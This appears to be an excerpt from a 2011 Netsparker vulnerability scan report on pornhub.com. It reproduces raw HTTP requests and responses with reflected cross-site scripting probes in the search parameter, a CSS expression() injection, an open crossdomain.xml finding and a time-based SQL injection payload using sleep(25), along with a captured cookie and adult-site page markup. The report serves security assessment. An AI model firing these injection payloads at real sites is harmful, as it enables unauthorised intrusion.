<li><a href="/video/search?o=mv&amp;t=t&amp;c=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &amp;search=='')">Daily</a></li>
<li><a href="/video/search?o=mv&amp;t=w&amp;c=" stYle=x:expre/**/ssion(ne..
- /video/search

/video/search

http://www.pornhub.com/video/search?search=%27%22%20ns=%20alert(0x000619)%20

Parameters

Parameter Type Value
search GET '" ns= alert(0x000619)

Request

GET /video/search?search=%27%22%20ns=%20netsparker(0x000619)%20 HTTP/1.1
Referer: http://www.pornhub.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.pornhub.com
Cookie: phub_in_player_security_key=a9b54de6d9c68db61c3dbc6c20a3976f; phub_in_player=4
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2011 10:10:13 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 5325
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link rel="shortcut icon" href="http://www.pornhub.com/favicon.ico" /> <link rel="alternate" type="text/html" media="handheld" href="http://m.pornhub.com" title="Mobile/PDA" /> <link rel="canonical" href="http://www.pornhub.com/video/search?search='" ns= netsparker(0x000619) " /><meta http-equiv="content-language" content="en" /> <meta name="keywords" content="porn, sex, free porn, porn community, sex movies, amateur sex, youtube of porn, pornhub, pornstars, full sex videos, porn videos" /> <meta name="description" content="The World Famous Pornhub.com, Porn hub is the ultimate free sex community. Amateurs upload, Pornstars have sex, and interact with each other. Download full porn videos." /> <title>No results found | PornHub.com</title> <!-- BEGIN ADCODE BLOCK --> <script type="text/javascript"> (function() { var rts = document.createElement('script'); rts.type = 'text/javascript'; rts.async = true; rts.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'rts.phn.doublepimp.com/Publishers/56c976c1dc.js?random=' + Math.floor(89999999*Math.random()+10000000) + '&amp;millis='+new Date().getTime(); var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(rts, s); })(); </script> <!-- END ADCODE BLOCK --> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/common.css" type="text/css" /> <!--[if lte IE 7]> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://www.google.com/jsapi"></script> <script type="text/javascript">/*<![CDATA[*/ google.load("jquery", "1.4.2"); /*]]>*/</script> <script type="text/javascript">/*<![CDATA[*/ google.load("jqueryui", "1.7.2"); /*]]>*/</script> <script type="text/javascript"> var $j = jQuery.noConflict(); </script> <script type="text/javascript">/*<![CDATA[*/ google.load("mootools", "1.2.3"); /*]]>*/</script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/phub.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/signin.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/Silverlight.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/bar.js"></script> <link rel="alternate" type="application/rss+xml" title="PornHub - RSS Feed" href="/rss" /> </head><body class="relative" style="z-index: 1;"><div id='popup_box'></div> <div id="signin_container" style="display:none;z-index:10;"> <div id="signin_border"></div> <div id="signin_background" style="background:transparent url(http://cdn1.static.pornhub.phncdn.com/images/signin_back_en.jpg) no-repeat 0 0;"> <div class="signin_error" style="top:84px;left:38px;display:none;"></div> <p class="signin_error" style="top:54px;left:38px;display:none;"></p> <p id="signin_loggingin" style="top:214px;left:125px;width:172px;text-align:center;display:none;">Logging in...</p> <a id="signin_forgotpassword" href="/front/lost_password" onclick="pageTracker._trackEvent('Login Page', 'Click Lost Password');" style="top:254px;left:125px;">Forgot Username or Password?</a> <a id="signin_confirmationemail" href="/front/resend_confirmation_email" onclick="pageTracker._trackEvent('Login Page', 'Click Resend Confirmation');" style="top:278px;left:125px;">Did not receive confirmation email?</a> <input type="hidden" id="signin_url" value="/login" /> <input type="hidden" id="signin_redirectTo" value="/video/search?search=%27%22%20ns=%20netsparker(0x000619)%20" /> <input id="signin_username" maxlength="18" class="signup_field" style="top: 95px; left:134px;" /> <input type="password" id="signin_password" maxlength="40" class="signup_field" style="top: 130px; left: 134px;" /> <input type="checkbox" id="signin_remember" value="1" style="top:166px;left:127px;" /> <button id="signin_submit" class="signup_button" style="top:210px;left:125px;">Login</button> <button class="signup_button" style="top:288px;left:582px;" onclick="window.location='/join_membership_plus?fa=1'">Sign up!</button> <button id="signin_close" style="top:5px;left:830px;"></button> </div> </div><div class="wrapper"><div class="header-wrapper"><div class="header02-nf"> <div class="logo-nf" style="width:335px;height:81px;overflow:hidden;"> <a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Logo');"> <img src="http://cdn1.static.pornhub.phncdn.com/images/pornhub_logo_en.png" alt="Pornhub" /> </a> </div> <!-- TOP RIGHT MENU --> <div class="top-right-menu-nf"> <a href="/uploader" onclick="pageTracker._trackEvent('Header Tabs', 'Upload');">Upload</a> l <a href="/blog" onclick="pageTracker._trackEvent('Header Tabs', 'Pornhub Blog');">Blog</a> l <a href="/gay" onclick="pageTracker._trackEvent('Header Tabs', 'Gay Porn');">Gay Porn</a> l <a id="header_login_link" href="javascript:signinbox.show();" onclick="pageTracker._trackEvent('Header Tabs', 'Login');">Login</a> l <a href="/join_membership_plus?fa=1" onclick="pageTracker._trackEvent('Header Tabs', 'Sign Up');">Sign Up</a> </div> <div class="flag-wrapper"> <ul> <li class="buttons-img" style="margin:-2px 0 0;"><a class="display-block" rel="nofollow" style="width:20px; height:21px; background-position:0 -68px;" href="http://twitter.com/pornhub" target="_blank"></a></li> <li class="flags-title">Language</li> <li class="buttons-img flag english"><a href="http://www.pornhub.com/video/search?search=%27%22%20ns=%20netsparker(0x000619)%20" class='active' onclick="pageTracker._trackEvent('Language Flags', 'English');"><span>English</span></a></li> <li class="buttons-img flag german"><a href="http://de.pornhub.com/video/search?search=%27%22%20ns=%20netsparker(0x000619)%20" onclick="pageTracker._trackEvent('Language Flags', 'German');"><span>Deutsch</span></a></li> <li class="buttons-img flag french"><a href="http://fr.pornhub.com/video/search?search=%27%22%20ns=%20netsparker(0x000619)%20" onclick="pageTracker._trackEvent('Language Flags', 'French');"><span>Fran&ccedil;ais</span></a></li> <li class="buttons-img flag mx"><a href="http://es.pornhub.com/video/search?search=%27%22%20ns=%20netsparker(0x000619)%20" onclick="pageTracker._trackEvent('Language Flags', 'Spanish');"><span>Espa&ntilde;ol</span></a></li> <li class="buttons-img flag italian"><a href="http://it.pornhub.com/video/search?search=%27%22%20ns=%20netsparker(0x000619)%20" onclick="pageTracker._trackEvent('Language Flags', 'Italian');"><span>Italiano</span></a></li> <li class="buttons-img flag portugese"><a href="http://pt.pornhub.com/video/search?search=%27%22%20ns=%20netsparker(0x000619)%20" onclick="pageTracker._trackEvent('Language Flags', 'Portugese');"><span>Portugu&ecirc;s</span></a></li> </ul> <div class="main-sprite language-marker" style="display:none;"></div> </div> <div class="wrapper-main-menu-nf"> <ul><li class="wide-btn-title wide-btn-title nf-home-main-menu"><a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Home Tab');">Home</a></li><li class="wide-btn-title"><a href="/video" onclick="pageTracker._trackEvent('Header Tabs', 'Videos Tab');">Videos</a></li><li class="wide-btn-title"><a href="/categories" onclick="pageTracker._trackEvent('Header Tabs', 'Categories Tab');">Categories</a></li> <li class="wide-btn-title"><a href="http://enter.pornhubpremium.com/track/NTQ1MzoyNTozNg/" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Premium Tab');" target="_self">Premium</a></li> <li class="wide-btn-title"><a target="_blank" href="http://mbs.pornhublive.com/xtarc/595728/437/0/?mta=338243" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Live Sex Tab');">Live Sex</a></li> <li class="wide-btn-title"><a target="_blank" href="http://ads.genericlink.com/ads/site/pornhub/dispatcher/ph_na_datingtab.php" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Real Sex Tab');">Get Laid</a></li> <li class="wide-btn-title"><a href="/community" rel="nofollow" class="" onclick="pageTracker._trackEvent('Header Tabs', 'Community Tab');">Community</a></li> <li class="wide-btn-title nf-search-main-menu"> <form id="search_form" method="get" action="/video/search" onsubmit="if(document.getElementById('search_value').value=='' || document.getElementById('search_value').value=='Search...') return false;"> <fieldset class="fs-nf"> <input class="main-sprite search-input-nf" type="text" onblur="if(this.value=='') {this.value = 'Search...';}" onfocus="if(this.value=='Search...') {this.value = '';}" value="Search..." name="search" maxlength="75" id="search_value" /> <input type="submit" value="" style="display:none" /> <input type="image" class="btn-search-top-menu-nf" src="http://cdn1.static.pornhub.phncdn.com/images/btn-search-nf.gif" value="search" /> </fieldset> </form> </li> </ul> </div> </div></div><div class="container"><div style="position:relative;float:left;width:960px;">

<!-- categories panel -->
<div class="nf-categories">
<!-- categories -->
<div class="box-flex-top"><h1>Categories<span>&nbsp;</span></h1></div>
<div class="box-flex-cont" style="width:146px;">
<ul class="nf-categories">
<li><a href="/video?c=3">Amateur</a></li><li><a href="/video?c=35">Anal</a></li><li><a href="/video?c=1">Asian</a></li><li><a href="/video?c=4">Ass</a></li><li><a href="/video?c=5">Babe</a></li><li><a href="/video?c=6">BBW</a></li><li><a href="/video?c=7">Big Dick</a></li><li><a href="/video?c=8">Big Tits</a></li><li><a href="/video?c=9">Blonde</a></li><li><a href="/video?c=13">Blowjob</a></li><li><a href="/video?c=10">Bondage</a></li><li><a href="/video?c=11">Brunette</a></li><li><a href="/video?c=14">Bukkake</a></li><li><a href="/video?c=74">Camel Toe</a></li><li><a href="/video?c=12">Celebrity</a></li><li><a href="/video?c=57">Compilation</a></li><li><a href="/video?c=15">Creampie</a></li><li><a href="/video?c=16">Cumshots</a></li><li><a href="/video?c=34">Dancing</a></li><li><a href="/video?c=72">Double Penetration</a></li><li><a href="/video?c=17">Ebony</a></li><li><a href="/video?c=55">Euro</a></li><li><a href="/video?c=73">Female Friendly</a><img src="http://cdn1.static.pornhub.phncdn.com/images/femalefriendly.gif" style="vertical-align:bottom;" /></li><li><a href="/video?c=18">Fetish</a></li><li><a href="/video?c=19">Fisting</a></li><li><a href="/video?c=32">Funny</a></li><li><a href="/gay">Gay</a></li><li><a href="/video?c=20">Handjob</a></li><li><a href="/video?c=21">Hardcore</a></li><li><a href="http://enter.pornhubpremium.com/track/NjUyNjoyNTozNg/join?tpl=join11">HD</a></li><li><a href="/video?c=36">Hentai</a></li><li><a href="/video?c=25">Interracial</a></li><li><a href="/video?c=26">Latina</a></li><li><a href="/video?c=27">Lesbian</a></li><li><a href="/video?c=22">Masturbation</a></li><li><a href="/video?c=28">Mature</a></li><li><a href="/video?c=29">MILF</a></li><li><a href="/video?c=2">Orgy</a></li><li><a href="/video?c=24">Outdoor</a></li><li><a href="/video?c=53">Party</a></li><li><a href="/video?c=30">Pornstar</a></li><li><a href="/video?c=41">POV</a></li><li><a href="/video?c=31">Reality</a></li><li><a href="/video?c=42">Red Head</a></li><li><a href="/video?c=67">Rough Sex</a></li><li><a href="/sex">Sex</a></li><li><a href="/shemale">Shemale</a></li><li><a href="/video?c=59">Small Tits</a></li><li><a href="/video?c=69">Squirt</a></li><li><a href="/video?c=33">Striptease</a></li><li><a href="/video?c=37">Teen</a></li><li><a href="/video?c=65">Threesome</a></li><li><a href="/video?c=23">Toys</a></li><li><a href="/video?c=43">Vintage</a></li><li><a href="/video?c=61">Webcam</a></li> </ul>
</div> </div>
<!-- videos pannel -->
<div class="nf-videos" style="width:802px;">
<!-- videos box -->
<div class="box-flex-top">
<h1>'&quot; ns= netsparker(0x000619) videos</h1>
<span>
<ul class="section_tabs">
<li class="section_tabs1"><a onmouseover="filters_show('none');" href="/video/search?search='&quot; ns= netsparker(0x000619) &amp;o=mr"><var>Most Recent</var></a></li>
<li class="section_tabs2"><a onmouseover="filters_show('mostviewedsubmenu');" href="/video/search?search='&quot; ns= netsparker(0x000619) &amp;o=mv"><var>Most Viewed</var></a></li>
<li class="section_tabs3"><a onmouseover="filters_show('toprated');" href="/video/search?search='&quot; ns= netsparker(0x000619) &amp;o=tr"><var>Top Rated</var></a></li>
<li class="section_tabs4"><a onmouseover="filters_show('none');" href="/video/search?search='&quot; ns= netsparker(0x000619) &amp;o=lg"><var>Longest</var></a></li>

</ul>
</span>
</div>
<div class="box-flex-cont" style="width:798px;float:right;padding-bottom:12px;">
<div class="jc-submenu-wrapper">
<ul class="jc-submenu-bar" id="mostviewedsubmenu">
<li><strong>Arrange Most Viewed By</strong></li>
<li><a href="/video/search?o=mv&amp;t=t&amp;search='&quot; ns= netsparker(0x000619) ">Daily</a></li>
<li><a href="/video/search?o=mv&amp;t=w&amp;search='&quot; ns= netsparker(0x000619) ">Weekly</a></li>
<li><a href="/video/search?o=mv&amp;t=m&amp;search='&quot; ns= netsparker(0x000619) ">Monthly</a></li>
<li><a href="/video/search?o=mv&amp;t=a&amp;search='&quot; ns= netsparker(0x000619) ">All time</a></li>
</ul>
<ul cla..
- /video/search

/video/search

http://www.pornhub.com/video/search?c=63&search=%27%22%20ns=%20alert(0x000FED)%20

Parameters

Parameter Type Value
c GET 63
search GET '" ns= alert(0x000FED)

Request

GET /video/search?c=63&search=%27%22%20ns=%20netsparker(0x000FED)%20 HTTP/1.1
Referer: http://www.pornhub.com/gay
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.pornhub.com
Cookie: phub_in_player_security_key=a9b54de6d9c68db61c3dbc6c20a3976f; phub_in_player=4
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2011 10:20:23 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 5380
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link rel="shortcut icon" href="http://www.pornhub.com/favicon.ico" /> <link rel="alternate" type="text/html" media="handheld" href="http://m.pornhub.com" title="Mobile/PDA" /> <link rel="canonical" href="http://www.pornhub.com/video/search?c=63&amp;search='" ns= netsparker(0x000fed) " /><meta http-equiv="content-language" content="en" /> <meta name="keywords" content="porn, sex, free porn, porn community, sex movies, amateur sex, youtube of porn, pornhub, pornstars, full sex videos, porn videos" /> <meta name="description" content="The World Famous Pornhub.com, Porn hub is the ultimate free sex community. Amateurs upload, Pornstars have sex, and interact with each other. Download full porn videos." /> <title>No results found | PornHub.com</title> <!-- BEGIN ADCODE BLOCK --> <script type="text/javascript"> (function() { var rts = document.createElement('script'); rts.type = 'text/javascript'; rts.async = true; rts.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'rts.phn.doublepimp.com/Publishers/56c976c1dc.js?random=' + Math.floor(89999999*Math.random()+10000000) + '&amp;millis='+new Date().getTime(); var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(rts, s); })(); </script> <!-- END ADCODE BLOCK --> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/common.css" type="text/css" /> <!--[if lte IE 7]> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://www.google.com/jsapi"></script> <script type="text/javascript">/*<![CDATA[*/ google.load("jquery", "1.4.2"); /*]]>*/</script> <script type="text/javascript">/*<![CDATA[*/ google.load("jqueryui", "1.7.2"); /*]]>*/</script> <script type="text/javascript"> var $j = jQuery.noConflict(); </script> <script type="text/javascript">/*<![CDATA[*/ google.load("mootools", "1.2.3"); /*]]>*/</script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/phub.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/signin.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/Silverlight.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/bar.js"></script> <link rel="alternate" type="application/rss+xml" title="PornHub - RSS Feed" href="/rss" /> </head><body class="relative" style="z-index: 1;"><div id='popup_box'></div> <div id="signin_container" style="display:none;z-index:10;"> <div id="signin_border"></div> <div id="signin_background" style="background:transparent url(http://cdn1.static.pornhub.phncdn.com/images/signin_back_en.jpg) no-repeat 0 0;"> <div class="signin_error" style="top:84px;left:38px;display:none;"></div> <p class="signin_error" style="top:54px;left:38px;display:none;"></p> <p id="signin_loggingin" style="top:214px;left:125px;width:172px;text-align:center;display:none;">Logging in...</p> <a id="signin_forgotpassword" href="/front/lost_password" onclick="pageTracker._trackEvent('Login Page', 'Click Lost Password');" style="top:254px;left:125px;">Forgot Username or Password?</a> <a id="signin_confirmationemail" href="/front/resend_confirmation_email" onclick="pageTracker._trackEvent('Login Page', 'Click Resend Confirmation');" style="top:278px;left:125px;">Did not receive confirmation email?</a> <input type="hidden" id="signin_url" value="/login" /> <input type="hidden" id="signin_redirectTo" value="/video/search?c=63&amp;search=%27%22%20ns=%20netsparker(0x000FED)%20" /> <input id="signin_username" maxlength="18" class="signup_field" style="top: 95px; left:134px;" /> <input type="password" id="signin_password" maxlength="40" class="signup_field" style="top: 130px; left: 134px;" /> <input type="checkbox" id="signin_remember" value="1" style="top:166px;left:127px;" /> <button id="signin_submit" class="signup_button" style="top:210px;left:125px;">Login</button> <button class="signup_button" style="top:288px;left:582px;" onclick="window.location='/join_membership_plus?fa=1'">Sign up!</button> <button id="signin_close" style="top:5px;left:830px;"></button> </div> </div><div class="wrapper"><div class="header-wrapper"><div class="header02-nf"> <div class="logo-nf" style="width:335px;height:81px;overflow:hidden;"> <a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Logo');"> <img src="http://cdn1.static.pornhub.phncdn.com/images/pornhub_logo_en_gay.png" alt="Pornhub" /> </a> </div> <!-- TOP RIGHT MENU --> <div class="top-right-menu-nf"> <a href="/uploader" onclick="pageTracker._trackEvent('Header Tabs', 'Upload');">Upload</a> l <a href="/blog" onclick="pageTracker._trackEvent('Header Tabs', 'Pornhub Blog');">Blog</a> l <a href="/gay" onclick="pageTracker._trackEvent('Header Tabs', 'Gay Porn');">Gay Porn</a> l <a id="header_login_link" href="javascript:signinbox.show();" onclick="pageTracker._trackEvent('Header Tabs', 'Login');">Login</a> l <a href="/join_membership_plus?fa=1" onclick="pageTracker._trackEvent('Header Tabs', 'Sign Up');">Sign Up</a> </div> <div class="flag-wrapper"> <ul> <li class="buttons-img" style="margin:-2px 0 0;"><a class="display-block" rel="nofollow" style="width:20px; height:21px; background-position:0 -68px;" href="http://twitter.com/pornhub" target="_blank"></a></li> <li class="flags-title">Language</li> <li class="buttons-img flag english"><a href="http://www.pornhub.com/video/search?c=63&amp;search=%27%22%20ns=%20netsparker(0x000FED)%20" class='active' onclick="pageTracker._trackEvent('Language Flags', 'English');"><span>English</span></a></li> <li class="buttons-img flag german"><a href="http://de.pornhub.com/video/search?c=63&amp;search=%27%22%20ns=%20netsparker(0x000FED)%20" onclick="pageTracker._trackEvent('Language Flags', 'German');"><span>Deutsch</span></a></li> <li class="buttons-img flag french"><a href="http://fr.pornhub.com/video/search?c=63&amp;search=%27%22%20ns=%20netsparker(0x000FED)%20" onclick="pageTracker._trackEvent('Language Flags', 'French');"><span>Fran&ccedil;ais</span></a></li> <li class="buttons-img flag mx"><a href="http://es.pornhub.com/video/search?c=63&amp;search=%27%22%20ns=%20netsparker(0x000FED)%20" onclick="pageTracker._trackEvent('Language Flags', 'Spanish');"><span>Espa&ntilde;ol</span></a></li> <li class="buttons-img flag italian"><a href="http://it.pornhub.com/video/search?c=63&amp;search=%27%22%20ns=%20netsparker(0x000FED)%20" onclick="pageTracker._trackEvent('Language Flags', 'Italian');"><span>Italiano</span></a></li> <li class="buttons-img flag portugese"><a href="http://pt.pornhub.com/video/search?c=63&amp;search=%27%22%20ns=%20netsparker(0x000FED)%20" onclick="pageTracker._trackEvent('Language Flags', 'Portugese');"><span>Portugu&ecirc;s</span></a></li> </ul> <div class="main-sprite language-marker" style="display:none;"></div> </div> <div class="wrapper-main-menu-nf"> <ul><li class="wide-btn-title wide-btn-title nf-home-main-menu"><a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Home Tab');">Home</a></li><li class="wide-btn-title"><a href="/video" onclick="pageTracker._trackEvent('Header Tabs', 'Videos Tab');">Videos</a></li><li class="wide-btn-title"><a href="/categories" onclick="pageTracker._trackEvent('Header Tabs', 'Categories Tab');">Categories</a></li> <li class="wide-btn-title"><a href="http://enter.juicyboys.com/track/OTk5NTo0MDo0Ng/" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Premium Tab');" target="_blank">HD Videos</a></li> <li class="wide-btn-title"><a target="_blank" href="http://mbs.pornhublive.com/xtarc/616295/437/13/?mta=338243" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Live Sex Tab');">Live Sex</a></li> <li class="wide-btn-title"><a target="_blank" href="http://ads.genericlink.com/ads/site/pornhub/dispatcher/ph_gay_datingtab.php" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Real Sex Tab');">Get Laid</a></li> <li class="wide-btn-title"><a href="/community" rel="nofollow" class="" onclick="pageTracker._trackEvent('Header Tabs', 'Community Tab');">Community</a></li> <li class="wide-btn-title nf-search-main-menu"> <form id="search_form" method="get" action="/video/search" onsubmit="if(document.getElementById('search_value').value=='' || document.getElementById('search_value').value=='Search...') return false;"> <fieldset class="fs-nf"> <input class="main-sprite search-input-nf" type="text" onblur="if(this.value=='') {this.value = 'Search...';}" onfocus="if(this.value=='Search...') {this.value = '';}" value="Search..." name="search" maxlength="75" id="search_value" /> <input type='hidden' name='c' value='63' /> <input type="submit" value="" style="display:none" /> <input type="image" class="btn-search-top-menu-nf" src="http://cdn1.static.pornhub.phncdn.com/images/btn-search-nf.gif" value="search" /> </fieldset> </form> </li> </ul> </div> </div></div><div class="container"><div style="position:relative;float:left;width:960px;">

<!-- categories panel -->
<div class="nf-categories">
<!-- categories -->
<div class="box-flex-top"><h1>Categories<span>&nbsp;</span></h1></div>
<div class="box-flex-cont" style="width:146px;">
<ul class="nf-categories">
<li><a href="/video?c=3">Amateur</a></li><li><a href="/video?c=35">Anal</a></li><li><a href="/video?c=1">Asian</a></li><li><a href="/video?c=4">Ass</a></li><li><a href="/video?c=5">Babe</a></li><li><a href="/video?c=6">BBW</a></li><li><a href="/video?c=7">Big Dick</a></li><li><a href="/video?c=8">Big Tits</a></li><li><a href="/video?c=9">Blonde</a></li><li><a href="/video?c=13">Blowjob</a></li><li><a href="/video?c=10">Bondage</a></li><li><a href="/video?c=11">Brunette</a></li><li><a href="/video?c=14">Bukkake</a></li><li><a href="/video?c=74">Camel Toe</a></li><li><a href="/video?c=12">Celebrity</a></li><li><a href="/video?c=57">Compilation</a></li><li><a href="/video?c=15">Creampie</a></li><li><a href="/video?c=16">Cumshots</a></li><li><a href="/video?c=34">Dancing</a></li><li><a href="/video?c=72">Double Penetration</a></li><li><a href="/video?c=17">Ebony</a></li><li><a href="/video?c=55">Euro</a></li><li><a href="/video?c=73">Female Friendly</a><img src="http://cdn1.static.pornhub.phncdn.com/images/femalefriendly.gif" style="vertical-align:bottom;" /></li><li><a href="/video?c=18">Fetish</a></li><li><a href="/video?c=19">Fisting</a></li><li><a href="/video?c=32">Funny</a></li><li><a href="/gay">Gay</a></li><li><a href="/video?c=20">Handjob</a></li><li><a href="/video?c=21">Hardcore</a></li><li><a href="http://enter.pornhubpremium.com/track/NjUyNjoyNTozNg/join?tpl=join11">HD</a></li><li><a href="/video?c=36">Hentai</a></li><li><a href="/video?c=25">Interracial</a></li><li><a href="/video?c=26">Latina</a></li><li><a href="/video?c=27">Lesbian</a></li><li><a href="/video?c=22">Masturbation</a></li><li><a href="/video?c=28">Mature</a></li><li><a href="/video?c=29">MILF</a></li><li><a href="/video?c=2">Orgy</a></li><li><a href="/video?c=24">Outdoor</a></li><li><a href="/video?c=53">Party</a></li><li><a href="/video?c=30">Pornstar</a></li><li><a href="/video?c=41">POV</a></li><li><a href="/video?c=31">Reality</a></li><li><a href="/video?c=42">Red Head</a></li><li><a href="/video?c=67">Rough Sex</a></li><li><a href="/sex">Sex</a></li><li><a href="/shemale">Shemale</a></li><li><a href="/video?c=59">Small Tits</a></li><li><a href="/video?c=69">Squirt</a></li><li><a href="/video?c=33">Striptease</a></li><li><a href="/video?c=37">Teen</a></li><li><a href="/video?c=65">Threesome</a></li><li><a href="/video?c=23">Toys</a></li><li><a href="/video?c=43">Vintage</a></li><li><a href="/video?c=61">Webcam</a></li> </ul>
</div> </div>
<!-- videos pannel -->
<div class="nf-videos" style="width:802px;">
<!-- videos box -->
<div class="box-flex-top">
<h1>'&quot; ns= netsparker(0x000FED) Gay videos</h1>
<span>
<ul class="section_tabs">
<li class="section_tabs1"><a onmouseover="filters_show('none');" href="/video/search?c=63&amp;search='&quot; ns= netsparker(0x000FED) &amp;o=mr"><var>Most Recent</var></a></li>
<li class="section_tabs2"><a onmouseover="filters_show('mostviewedsubmenu');" href="/video/search?c=63&amp;search='&quot; ns= netsparker(0x000FED) &amp;o=mv"><var>Most Viewed</var></a></li>
<li class="section_tabs3"><a onmouseover="filters_show('toprated');" href="/video/search?c=63&amp;search='&quot; ns= netsparker(0x000FED) &amp;o=tr"><var>Top Rated</var></a></li>
<li class="section_tabs4"><a onmouseover="filters_show('none');" href="/video/search?c=63&amp;search='&quot; ns= netsparker(0x000FED) &amp;o=lg"><var>Longest</var></a></li>

</ul>
</span>
</div>
<div class="box-flex-cont" style="width:798px;float:right;padding-bottom:12px;">
<div class="jc-submenu-wrapper">
<ul class="jc-submenu-bar" id="mostviewedsubmenu">
<li><strong>Arrange Most Viewed By</strong></li>
<li><a href="/video/search?o=mv&amp;t=t&amp;c=63&amp;search='&quot; ns= netsparker(0x000FED) ">Daily</a></li>
<li><a href="/video/search?o=mv&amp;t=w&amp;c=63&amp;search='&quot; ns= netsparker(0x000FED) ">Weekly</a></li>
<li><a href="/video/search?o=mv&amp;t=m&amp;c=63&amp;search='&quot; ns= netspark..
Open Policy Crossdomain.xml Identified

Open Policy Crossdomain.xml Identified

1 TOTAL
MEDIUM
CONFIRMED
1
Netsparker identified Open Policy Crossdomain.xml file.

Impact

Open Policy Crossdomain.xml file allows other SWF files to make HTTP requests to your web server and see its response. This can be used for accessing one time tokens and CSRF nonces to bypass CSRF restrictions.

Remedy

Configure your Crossdomain.xml to prevent access from everywhere to your domain.

External References

- /crossdomain.xml

/crossdomain.xml CONFIRMED

http://www.pornhub.com/crossdomain.xml

Policy Rules

Request

GET /crossdomain.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.pornhub.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2011 10:08:26 GMT
Server: Apache
Last-Modified: Thu, 14 Apr 2011 19:33:56 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 154
Content-Type: application/xml


<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /user/search

/user/search CONFIRMED

http://www.pornhub.com/user/search?o=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&l=1

Parameters

Parameter Type Value
o GET -1 AND (SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25))-- 1
l GET 1

Request

GET /user/search?o=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&l=1 HTTP/1.1
Referer: http://www.pornhub.com/community
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.pornhub.com
Cookie: phub_in_player_security_key=a9b54de6d9c68db61c3dbc6c20a3976f; phub_in_player=4; flash_values=YToxOntzOjg6Im1lc3NhZ2VzIjthOjE6e3M6NToiZXJyb3IiO2E6MTp7aTowO3M6Mjc6IlRoaXMgdXNlciBpcyBub3QgYXZhaWxhYmxlLiI7fX19
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 02 Jun 2011 10:10:54 GMT
Server: Apache
